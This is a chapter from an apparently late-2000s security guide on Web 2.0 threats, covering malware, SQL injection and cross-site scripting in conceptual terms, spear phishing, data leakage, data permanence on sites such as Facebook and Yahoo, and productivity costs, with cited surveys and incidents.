1. Web 2.0 Threats – How to Use Web 2.0 and Social Networking Sites Securely

Chapter 1. Web 2.0 Threats

The technologies and trends which are helping to revolutionise the way in which we use the Web, also create security risks. Trends such as user-created content, synchronous communication, openness and transparency, online collaboration and the viral nature of Web 2.0 all create security risks. The following table summarises the type of security risk created by Web 2.0 trends.

Table 1. Table showing the type of security risk created by Web 2.0 trends

Web 2.0 trend

Web 2.0 technologies

Type of security risk

User-created content

Blogs

Wikis

Social networking

Collaboration tools

Video sharing and photo sharing

User created content input to a website creates a website entry point for hackers and malware.

Enables targeted phishing attacks.

Loss of productivity.

Data leakage.

Reputational damage.

Synchronous communication

Instant messaging

Live blogging, e.g. Twitter

Outbound data leaks and inbound malware.

Technologies such as Twitter and Instant Messaging, unlike e-mail, do not have any automatic back-up facility.

The speed of the communication means that it is possible to download or export files without leaving any trace or record of having done so.

Openness and transparency

Mashups

Technologies which enable music, video and photo sharing

Social networking

Data leakage.

Reputational damage.

 

Open source software

 

Online collaboration

 

Many of the collaborative tools provide file sharing capabilities, a vector through which confidential information could be exported or malware imported.

The uploading and downloading of files, particularly media files such as video and music, also creates high bandwidth requirements, which can slow down an organisation’s network.

The types of threats to organisations using Web 2.0 applications include:

  • Infections and downtime caused by malware, viruses, worms, Trojans and spyware.

  • Hacking attacks which cause personal and company data loss, outsider control of networks.

  • Phishing and social engineering attacks which cause data leakage.

  • Threats from downloaded content.

  • Loss of productivity caused by employee’s use of Web 2.0 technologies for personal use.

  • Data leakage.

  • Reputational risk.

Malware and blended attacks

Malware includes viruses, worms, Trojans and spyware; Web 2.0 applications are no less susceptible to malware than Web 1.0 applications. Blogs, social networking sites, wikis and mashups are all susceptible to malware attacks. Folksonomies can enable links to malware-infected sites or files.

Web 2.0 tools enable users to upload files and documents. This increases the risk of malware being spread. For example, there are now over 25,000 different applications available for users of Facebook to share. Many of these applications are written by users and are made freely available, in an Open Source manner. There is no logical reason to assume that all files which are downloaded from ‘friends’ within social networking sites, or from applications within these sites, are malware and spyware free.

There are also blended attacks which specifically target Web 2.0 technologies. ‘Blended attacks’ are those whereby mass-mailing, virus-delivery mechanisms are used to insert Trojans into target systems, which hackers can then use to bypass firewalls and other defences.

For example, in December 2006, the ‘JS.Qspace’ worm was discovered by Symantec on MySpace[6]. This ‘worm’ injects code which directs the user to a phishing page. The phishing page attempts to steal MySpace credentials by asking users for e-mail addresses and passwords.

Another example of a blended attack is the Monster.com resume thefts of August 2007[7]. ‘Hackers used malware (Infostealer.Monstres) to gain unauthorised access to the Monster.com resume database and stole job seekers’ contact information. Compromised data included the name, address, telephone number, and e-mail address of people who registered with the job seeking service. Neither social security numbers nor credit card records are thought to have been exposed. However, the compromised data has been used to craft targeted phishing attacks that sought to trick users into downloading malicious software’. Typically, this sort of malware is designed to intercept and pass on the details of financial transactions.

Hacking attacks

Insecure Web 2.0 applications can create security vulnerabilities in a corporate operating system or other application; when the original security weakness is patched, the derived vulnerabilities are not necessarily also fixed, and Web 2.0 companies do not necessarily communicate sufficiently with users who may have compromised systems. For example, security vulnerabilities in Gmail have caused e-mails to be transferred and stolen with consequent potential data disclosure[8]. Although Google patched the vulnerability, users of Gmail were not necessarily made aware of the need to repair the derived vulnerability in their own systems. The fact that Web 2.0 companies apparently prefer to downplay such issues might lead to them becoming a preferred attack vector for hackers and malware jockeys.

The nature of hacking attacks is increasingly moving from exploiting vulnerabilities to focusing on the application code itself[9]. Websites which accept input from users provide openings for attacks such as SQL injections and cross-site scripting.

SQL injection attacks

An SQL injection attack is a type of exploit whereby hackers are able to execute SQL statements via an Internet browser[10]. Hackers are able to execute SQL statements via the input of a web application. SQL is an acronym for ‘Structured Query Language’. SQL is a programming language used for getting information from and updating data in a relational database. It is based on mathematical set theory.

An example of an SQL injection attack would be where, instead of entering personal details on a sales website, say, where a postcode or zip code should be, a hacker may enter SQL commands which then return information.

SQL injections can result in data being corrupted, or enable attackers to retrieve data such as credit card numbers. They can therefore prove to be extremely costly for organisations. It is therefore far more preferable to prevent SQL injection attacks from occurring.

An application which is well-written will not allow SQL commands to be accepted as user input. There is therefore a need to develop web applications which are more secure, and to keep these more secure.

Cross-site scripting

Cross-site scripting, or XSS[11] attacks involve the injection of code such as JavaScript or VBScript onto a web page which is returned from a server to a users’ browser. If this code is then executed by the user, they are then exposed to a variety of threats, including cookie theft, keystroke logging, screen scraping and denial of service.

Cookie theft

A cookie is a small data file[12] that a website stores on a surfer’s computer and which contains information about the user (e.g. user preferences) that is relevant to the user’s experience of the website.

Cookie theft occurs when an attacker uses an injection of code to obtain data held in cookies without the user’s knowledge. For example, the attacker can add code to the browser to display a comment ‘Click here!’ When the user clicks on the link, their cookies are downloaded to the attacker’s server.

Keystroke logging

Keystroke logging occurs when hackers record key depressions on a computer keyboard using special software[13]. This software can either be installed on the computer (in which case it can be detected by AntiSpyware software) or it can run inside a secret device attached to the computer, in which case AntiSpyware software will not detect it. Keystroke logging can lead to the theft of user identification and authentication data.

Screen scraping

As the name suggests, screen scraping is a technique in which a computer program extracts data from the display output of another program[14]. Within the context of IT security screen scraping can reveal further authentication information selected by the user from dropdown lists, etc.

Denial of service

A ‘Denial of service’ (DOS) attack[15] is designed to put an organisation out of business, or to interrupt the activities of an individual or group of individuals, for a time by freezing its systems. This is usually done by flooding a web server (or other device) with e-mail messages or other data so that it is unable to provide a normal service to authorised users.

Threats from downloaded content

Users need to ensure that downloaded content is from a reliable source. However harmless, innocent, cute or valuable it looks, they should not click on a link on a website unless they are certain it is from a trustworthy source.

The risk with downloading insecure software which is not secure is that malware, spyware or adware will be downloaded to your computer. When users surf to a website, they should make sure that they are actually using the site that they think they are and that they haven’t been elsewhere. Alternative sites may want to retrieve personal or company data and have the opportunity to download something through the browser.

For example, Risk Management[16] describes malware present in Facebook, the social networking application. Users invited friends to download the ‘crush calculator’ application. The application would then download adware without the user’s knowledge. Sophos describe[17] how visitors attempting to purchase tickets for the Euro 2008 championships may have been exposed to malware which then attempts to download further attacks from a second website. Similarly, the UK, ITV website was infected with code[18] which displayed adverts claiming to detect ‘compromising files’ and prompting users to purchase the ‘Cleanator’ or ‘MacSweeper’ program.

Similarly, security vulnerabilities in Gmail have also caused e-mails to be transferred and stolen with consequent potential data disclosure[19]. Although Google patched the vulnerability, users of Gmail were not necessarily made aware of the need to repair the derived vulnerability in their own systems.

Phishing

The personal and sensitive information which is provided on social networking sites enables phishers to create targeted phishing attacks. The inclusion of such personal and sensitive data creates a level plausibility which means that the attacks are far more likely to be successful. This highly targeted attack is called ‘spear phishing’. In addition, fake profiles are used to create false friendships, for misuse at a later stage.

Sophos, an IT security and control company, conducted some research in which they created a fake profile for ‘Freddi Staur’, a small green plastic frog who divulged minimal information about himself. Sophos then sent out 200 friend requests to observe how people would respond and how much personal information would be revealed. The findings were as follows[20]:

  • 87 of the 200 Facebook users contacted responded to Freddi, 82 of them provided personal information (41% of those approached).

  • 72% of respondents divulged one or more e-mail address.

  • 84% of respondents listed their full date of birth.

  • 87% of respondents provided details about their education or workplace.

  • 78% of respondents listed their current address or location.

  • 23% of respondents listed their current phone number.

  • 26% of respondents provided their IM (Instant Messaging) screen name.

Some phishers are e-mailing invitations to associates, creating log-in screens that falsely represent the social site registration page and using this opportunity to acquire genuine user names and passwords. Many people use just one password for all of their online activity, and will repeat it on the false social networking site. Acquiring knowledge of this password can be incredibly valuable to an attacker.

Social engineering

There are concerns that the increase in malware in certain industry sectors is linked to social engineering[21]. A study by ScanSafe has shown a higher incidence of malware attacks in the energy and oil, pharmaceutical and chemical, engineering and construction, and transportation industries. It would seem from the study that the malware was caused, not by clicking on a link or typing in a URL, but from a compromised website.

Loss of productivity

Web 2.0 sites and in particular, social networking sites, can be very addictive as well as time consuming.

A report recently published by Global Secure Systems (GSS) and Infosec Europe 2008[22] puts the cost of lost productivity to UK organisations at £6.5 billion[23] (€8.1 billion, $12.7 billion). These results showed that some respondents were spending three hours a day on Web 2.0 sites. In addition, one company reported that the use of such sites cost it an extra 30% in bandwidth.

The cost of lost productivity was calculated[24] as A x B x C x D x E, where:

A = £11.46 (this is the mean figure based on the average hourly rate of pay for an office worker (£8.70 an hour) and the average hourly rate of an office manager (£14.23) according to the Office for National Statistics 2007).

B = 11.5 million employees have Internet access at work (Office for National Statistics 2007).

C = average of 45 working weeks in a year (52 weeks minus four weeks holiday, two weeks of bank holidays and one week off sick).

D = average of two hours 30 minutes a week visiting social networking sites.

E = 41% of employees admitting to visiting social networking sites at work (according to the survey).

A recent survey carried out by FaceTime found the following percentages of employees used their PC at work for personal reasons:

Source: Derived from FaceTime Fourth Annual Survey, October 2008, www.facetime.com/survey08/securityincidents/

Figure 4. Graph showing the percentage of staff using their PC at work for personal reasons

However, it may be that the quoted figures on productivity loss belie the true picture. Those employees who use their PC at work for personal reasons may also use their computers at home for work purposes. The same FaceTime study showed that 85% of employees who owned a PC used their PC at home for work e-mail purposes. 79% used social networking at work, for work purposes. Employees used sites such as Facebook, LinkedIn and YouTube for business reasons and 51% visited such sites at least once a day.

In addition, there is a growing awareness that the preferred communication methods of the newer entrants to the workforce are different to those of their older colleagues. Much of the younger workforce is used to communicating using tools such as social networking sites in preference to ‘traditional’ tools such as e-mail. Pete Swabey[25] suggests that ‘social networking sites succeed where countless enterprise knowledge management and collaboration projects have failed’.

There are views that employee productivity issues are a reflection of management styles. Chris Head, from the UK public sector portal says ‘Good managers do not worry about time wasting; they judge performance by output, not whether the employee is present from nine to five. Denied the opportunity to use social networking, time-wasters will find plenty of other outlets’[26].

Cultural factors also play a part. Anecdotal evidence from Ben Chai[27] suggests that ‘privilege abuse’, that is, using sites at work which are not allowed according to their employer’s Internet acceptable use policy, is to some extent determined by culture and is more prevalent in the UK than elsewhere in the world.

Data leakage

Web 2.0 technologies create many risks for employees and organisations in respect of possible leakage of personal and company data.

Most users are unaware of the vast quantity of personal data that they voluntarily or accidentally disclose and which is then spread over the Internet. Neither are they aware of the potential for the abuse and reuse of this data in contexts other than those for which they were gathered. Collections of data are not static, the scope, function and ownership can change rapidly and the data subjects are not necessarily aware of how their data is or could be used.

Most importantly, once data has been disclosed, it can never be deleted.

The different types of personal and company data and associated risks

We all hope that personal data entered onto a website will be secure and free from data breaches or the inadvertent disclosure to unauthorised parties. However, unfortunately, this may not always be the case. The press is full of examples of data breaches, many of them breaches of data entered onto websites.

Depending on the type of data which is inadvertently disclosed, this can have differing ramifications. It is important to understand the criticality of these ramifications when entering data onto a Web 2.0 website.

Name and e-mail address

These can be used for phishing attacks.

General personal data

The personal and sensitive information which is provided on social networking sites enables phishers to create targeted phishing attacks. The inclusion of such personal and sensitive data creates a level of plausibility which means that the attacks are far more likely to be successful. This highly targeted attack is called ‘spear phishing’.

Bank account information

This can be used to make fraudulent financial purchases.

Date of birth/mother’s maiden name

This constitutes personally identifiable information which can be used to obtain a driving licence or a passport. These can in turn be used fraudulently to take out large loans in another person’s name, or as proof of ID if arrested. This can also make identify theft possible, as a result of which a victim will discover that someone else has run up large financial debts or even acquired criminal convictions in their name. Clearing identify theft can be extremely time-consuming, expensive and very difficult.

CVs and professional homepages

These contain information that can also be used for identity theft. The UK BBC News has reported that, in an experiment involving a fake website luring people into submitting their CVs, 61 contained sufficient information to apply for a credit card[28]. According to iProfile, ‘the most useful items of information for criminals, which should be omitted from an online CV, are date of birth, marital status, and place of birth’[29].

The Internet also makes it easy to identify those individuals it would be most lucrative to steal from in terms of the type of job they have and the kind of salary they earn.

The volume of personal and company data stored on the Internet

Not only do more and more bodies hold our basic personal details in their systems, but also new information may be added every day. According to one estimate made in 2004, information about the average working adult is stored on some 700 databases[30].

The amount of personal data which is stored and aggregated electronically is greater now than ever before. Examples include:

  1. Companies increasingly use personal information to better target products and services and to try and establish a relationship with customers through learning key pieces of personal information. For example, Amazon uses information about previous purchasing, and previous web activity in order to target products that the customer might be interested in purchasing in the future.

  2. The public sector increasingly holds personal data electronically. Examples include driving licence information, tax, national insurance, child benefit and electoral roll. The data held often includes bank account numbers and personally identifiable information.

  3. Credit companies such as Experian hold records of financial transactions and credit card ownership to provide comments on customer creditworthiness.

  4. Transport operators will use information from travel tickets purchased online to develop a picture of an individual’s travel patterns.

  5. Governments use personal data for crime detection and surveillance purposes. For example, government agencies may ‘mine’ personal data such as phone, medical, travel records or websites visited[31]. The National Research Council say ‘Each time a person makes a telephone call, uses a credit card, pays taxes, or takes a trip, he or she leaves digital tracks, records that often end up in massive corporate or government databases.......... Agencies use sophisticated techniques to mine some of these databases – searching for information on particular suspects, and looking for unusual patterns of activity that may indicate a terrorist network....... Although some laws limit what types of data the government may collect, there are few legal limits on how agencies can use already-collected data, including those gathered by private companies’[32].

Length of time personal and company data is stored on the Internet

Although it might be possible to disable an account, it is not always possible to delete an account or the data, which means that it may remain permanently. For example, Facebook accounts cannot be deleted, they can only be ‘deactivated’. In addition, data included on websites and SERPs (Search Engine Results Page), including personal data, also remains permanently available.

The following table describes the permanence of data stored in a selection of web applications:

Table 2. The permanence of data stored in a selection of Web applications

Web application

Permanence of data

Facebook

Personal data stored in a profile, including photos, interests and friends can be deleted, with the exception of name and date of birth. Facebook will deactivate or delete an account. Accounts can be deleted using the following link:

How to permanently delete your Facebook account.

Wikipedia

The following extract is from the Wikipedia privacy page[33]:

‘Removing text from Wikimedia projects does not permanently delete it. In normal articles, anyone can look at a previous version and see what was there. If an article is “deleted”, any user with “administrator” access on the wiki, meaning almost anyone trusted not to abuse the deletion capability, can see what was deleted. Information can be permanently deleted by those people with access to the servers, but there is no guarantee this will happen except in response to legal action’.

Google

The most recent reports (9 September 2008) are that Google stores users’ personally identifiable data for nine months[34].

Yahoo

Yahoo stores user’s personally identifiable information, including name, e-mail address, date of birth, gender, postcode, occupation, industry, and personal interests[35]. Users can request that Yahoo delete an account. The current Yahoo privacy policy (October 2008) says that[36]:

‘An account will be deactivated and then deleted from our user registration database in approximately 90 days. This delay is necessary to discourage users from engaging in fraudulent activity. Any information that we have copied may remain in back-up storage for some period of time after your deletion request’.

[33] ‘Privacy policy from the Wikimedia Foundation’, Wikipedia, http://wikimediafoundation.org/wiki/Privacy_policy.

[34] ‘Google cuts how long it stores users’ personal data’, Reuters, 9 September 2008, www.reuters.com/article/technologyNews/idUSN0847077420080909.

[35] ‘Yahoo! Privacy and Cookie Policy’, http://info.yahoo.com/privacy/uk/yahoo/.

Subsequent uses of personal and company data

Web users should be aware that personal data posted to a website may subsequently be used in ways which previously have not been anticipated and which may lead to false information or false allegations.

This increased computing power and storage has meant that companies are increasingly more able to derive value from mass combinations of data. Companies use personal information to target products and services and to try and establish a marketing relationship with customers through learning key pieces of personal information. ‘Data warehouses are mined to bring out added value from previously disparate and disconnected snippets of personal data and companies offer benefits in return for the submission of this information from potential customers’[37]. This increasing use of personal data also causes an increase in the risk of its accidental and malicious misuse. In addition, there is a greater likelihood that the inappropriate use of personal data can cause harm, for example in refused credit control and/or health insurance.

For example, the National Research Council says that ‘even well-managed programmes necessarily result in some “false positives” where innocent people are flagged as possible threats, and their personal information is examined’[38]. In 2003, Tesco traced a customer mistakenly suspected of stealing from one of its stores to her home through her loyalty card after watching her on a CCTV system[39]. RAND report that ‘the ability of data controllers to correlate disparate snippets of personal data may result in more systemic social and demographic exclusion; for example, prior denial of access to health insurance due to knowledge of susceptibility to certain diseases gained from DNA or sensitive personal data’[40].

Personal and company profiles and the broad meaning of ‘friends’

Many Web 2.0 technologies use ‘user profiles’ to enable users to participate in conversation threads and download content. In addition, social networking sites use the concept of ‘friends’ as a level of information sharing. User profiles and the concept of friends, combined with the ‘open’ approach to Web 2.0 technologies have meant that users are less aware of the risks of disclosing company and/or personal data. There is evidence which supports this.

For example, a survey carried out by IT Governance Ltd, May 2008 showed that over 27% of respondents would feel comfortable about providing their date of birth on a social networking site, and 11% would feel comfortable about providing their religious beliefs, sexual orientation and recent party photos. Apart from the data privacy and data protection issues, this data can also be used for identity theft, targeted spear phishing attacks, to reveal personal information which could be libellous and to expose confidential company information.

Websites using Web 2.0 technologies are able to collect and collate very large amounts of personal data. This may be stored on User profiles, comments posted on a blog or wiki or on Web 2.0 collaboration tools, or uploaded to social networking tools.

There are four levels of visibility of personal data which users may or may not be able to change:

  1. Visibility of data. The settings for the visibility of data may be changed. For example, on social networking sites, users can determine who is able to view a user’s personal profile – family and friends, contacts or everyone. This may be set for the entire profile, or for specific data items such as date of birth.

  2. Account activation or deactivation. When an account is deactivated, the personal data remains, but is not visible.

  3. Account deletion.

  4. Items copied to other social networks.

Frequently, the default setting is for personal and sensitive data to be publicly available.

The available settings for the visibility of personal and sensitive data stored in a ‘profile’ are usually:

  • Private

  • Available to friends only

  • Publicly available

  • A combination.

We created fictitious accounts in Facebook, MySpace and Bebo in order to determine the default privacy settings. As an example, the following table shows the default privacy setting for date of birth – often a key security-related question for accessing bank accounts – for a selection of social networking sites:

Table 3. Default settings for the visibility of date of birth on selected social networking sites

Social networking site

Default setting

Facebook

Available to friends

MySpace

Available to friends

Bebo

Private

The concept of ‘friends’

Social networking is based on the concept of ‘friends’, a word which has connotations of trust, loyalty and liking. The dictionary definition of ‘friend’ is ‘a person whom you know well and whom you like a lot, but who is usually not a member of your family’[41]. The social networking sense of the word ‘friend’ is slightly different; the term ‘buddy’ may be more appropriate as a description of someone with whom one can share likes and dislikes and information but to whom one would not normally disclose confidential or valuable information.

Social networking sites enable users to link to other ‘friends’ by voice, chat, instant message, videoconference and blog. The danger is that the connotations of friendship can lull users into a false sense of security as a result of which they will share or provide information and data which in other circumstances they would keep to themselves.

Reputational risk

The viral nature of Web 2.0 technologies, the philosophy of openness and sharing amongst ‘friends’ and the permanence of data stored on the Internet combine to create enhanced risks of personal and company reputational damage.

The interactive and informal nature of Web 2.0 technologies makes it easier than ever for people to pretend to be from reputable companies, thereby causing brand damage. For example, Risk Management[42] describes how ‘Janet at ExxonMobilCorp’ posed as a company employee on Twitter.



[7] ‘Internet Risk Management in the Web 2.0 World’, Forrester Computing, September 2007.

[8] ‘Bullseye on Google: Hackers expose holes in Gmail, Blogspot, Search Appliance’, ZdNet, 25 September, 2007, http://blogs.zdnet.com/security/?p=539.

[9] ‘Strategies to protect your web applications and your organisation’, John Pescatore, Gartner, IT Briefing centre webcast.

[10] ‘SQL Injection’, SmoothWall, www.smoothwall.net/support/glossary.php#S.

[11] Web 2.0 Security for Dummies, Clearswift, 2007.

[12] A Dictionary of Information Security Terms, Abbreviations and Acronyms, Alan Calder and Steve Watkins, IT Governance Publishing (2007).

[13] A Dictionary of Information Security Terms, Abbreviations and Acronyms, Alan Calder and Steve Watkins, IT Governance Publishing (2007).

[14] ‘Screen scraping’, Wikipedia, http://en.wikipedia.org/wiki/Screen_scraping.

[15] A Dictionary of Information Security Terms, Abbreviations and Acronyms, Alan Calder and Steve Watkins, IT Governance Publishing (2007).

[17] ‘Euro 2008 football ticket website hacked by cybercriminals to infect unwary fans’, Sophos, March 2008, www.sophos.com/pressoffice/news/articles/2008/03/euro2008.html.

[18] ‘Poisoned TV website adverts lead to PC and Mac scareware’, Sophos, February 2008, www.sophos.com/pressoffice/news/articles/2008/02/poisoned-adverts.html.

[19] ‘Bullseye on Google: Hackers expose holes in Gmail, Blogspot, Search Appliance’, ZdNet, 25 September 2007, http://blogs.zdnet.com/security/?p=539.

[21] ‘Web-borne malware targets unexpected industries’, Neil Roiter, SearchSecurity.com, 13 November 2008, http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1338866,00.html.

[23] £6,500,000,000, quoted by GSS.

[25] ‘Power to the People’, Information Age, April 2008.

[26] ‘Web revolution heralds bright future’, Chris Head, The Information Portal for the Public Sector, October 2008, www.publicservice.co.uk/feature_story.asp?id=10653.

[27] Ben Chai (Security Consultant, Incoming Thought Limited), ‘Securely tapping into the business benefits of Web 2.0 technology’, Infosecurity webinar, 11 June 2008.

[28] ‘Job seekers warned over CV theft’, BBC News, 20 October 2008, http://news.bbc.co.uk/2/hi/business/7680091.stm.

[29] ‘Secure your CV’, iProfile, October 2008, www.iprofile.org/Career-Advice/Secure-Your-CV/default.aspx.

[30] ‘Data protection – Who’s watching you?’, Lisa Kelly, AccountancyAge, August 2004, www.accountancyage.com/accountancyage/features/2040414/protection-watching.

[31] ‘All Counterterrorism Programs That Collect and Mine Data Should Be Evaluated for Effectiveness, Privacy Impacts; Congress Should Consider New Privacy Safeguards’, 7 October 2008, The National Academies, www8.nationalacademies.org/onpinews/newsitem.aspx?RecordID=10072008A.

[32] ‘All Counterterrorism Programs That Collect and Mine Data Should Be Evaluated for Effectiveness, Privacy Impacts; Congress Should Consider New Privacy Safeguards’, 7 October 2008, The National Academies, www8.nationalacademies.org/onpinews/newsitem.aspx?RecordID=10072008A.

[37] ‘Review of EU Data Protection Directive, Inception Report’, Robinson et al, RAND Corporation, August 2008, www.rand.org/pubs/working_papers/WR607/.

[38] ‘All Counterterrorism Programs That Collect and Mine Data Should Be Evaluated for Effectiveness, Privacy Impacts; Congress Should Consider New Privacy Safeguards’, 7 October 2008, The National Academies, www8.nationalacademies.org/onpinews/newsitem.aspx?RecordID=10072008A.

[39] ‘Data protection – Who’s watching you?’, Lisa Kelly, AccountancyAge, August 2004, www.accountancyage.com/accountancyage/features/2040414/protection-watching.

[40] ‘Review of EU Data Protection Directive, Inception Report’, Robinson et al, RAND corporation, August 2008, www.rand.org/pubs/working_papers/WR607/.